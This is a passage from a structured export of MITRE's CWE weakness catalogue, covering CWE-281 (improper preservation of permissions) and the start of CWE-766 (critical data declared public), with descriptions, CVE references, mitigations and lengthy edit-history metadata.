"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-11-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-09-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2017-05-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-05-27",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Insecure Execution-assigned Permissions",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "732",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 2
|
[
[
"284",
"285",
"732",
"279"
],
[
"664",
"668",
"732",
"279"
]
] |
[] |
281
|
Improper Preservation of Permissions
|
Base
|
Simple
|
Draft
|
The product does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Modify Application Data"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity"
]
}
] | null |
[
{
"Description": "Incorrect ACLs used when restoring backups from directories that use symbolic links.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-2323",
"Reference": "CVE-2002-2323"
},
{
"Description": "Automatic modification of permissions inherited from another file system.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1515",
"Reference": "CVE-2001-1515"
},
{
"Description": "Permissions on backup file are created with defaults, possibly less secure than original file.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1920",
"Reference": "CVE-2005-1920"
},
{
"Description": "File is made world-readable when being cloned.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-0195",
"Reference": "CVE-2001-0195"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Permission preservation failure",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Time_of_Introduction",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-05-27",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Permission Preservation Failure",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "732",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": "This is resultant from errors that prevent the permissions from being preserved.",
"Ordinality": "Resultant"
}
] | null | null | null | null | null | null | 2
|
[
[
"284",
"285",
"732",
"281"
],
[
"664",
"668",
"732",
"281"
]
] |
[] |
766
|
Critical Data Element Declared Public
|
Base
|
Simple
|
Incomplete
|
The product declares a critical variable, field, or member to be public when intended security policy requires it to be private.
|
This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities.
|
[
{
"Class": null,
"Name": "C++",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "C#",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "Java",
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Modify Application Data"
],
"Likelihood": null,
"Note": "Making a critical variable public allows anyone with access to the object in which the variable is contained to alter or read the value.",
"Scope": [
"Integrity",
"Confidentiality"
]
},
{
"Impact": [
"Reduce Maintainability"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Other"
]
}
] |
[
{
"Description": "Data should be private, static, and final whenever possible. This will assure that your code is protected by instantiating early, preventing access, and preventing tampering.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "variables declared public allow remote read of system properties such as user name and home directory.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2010-3860",
"Reference": "CVE-2010-3860"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Failure to protect stored data from modification",
"MappingFit": null,
"TaxonomyName": "CLASP"
},
{
"EntryID": "OBJ01-J",
"EntryName": "Declare data members as private and provide accessible wrapper methods",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
},
{
"EntryID": "SFP28",
"EntryName": "Unexpected access points",
"MappingFit": null,
"TaxonomyName": "Software Fault Patterns"
},
{
"EntryID": "ASCMM-MNT-15",
"EntryName": null,
"MappingFit": null,
"TaxonomyName": "OMG ASCMM"
}
] | null |
[
{
"Authors": [
"Object Management Group (OMG)"
],
"Edition": null,
"ExternalReferenceID": "REF-960",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": "01",
"PublicationYear": "2016",
"Publisher": null,
"Section": "ASCMM-MNT-15",
"Title": "Automated Source Code Maintainability Measure (ASCMM)",
"URL": "https://www.omg.org/spec/ASCMM/",
"URLDate": "2023-04-07"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2009-03-03",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2009-05-27",
"SubmissionVersion": "1.4",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2010-12-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Likelihood_of_Exploit, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Description, Name, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, References, Relationships, Time_of_Introduction, Type",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
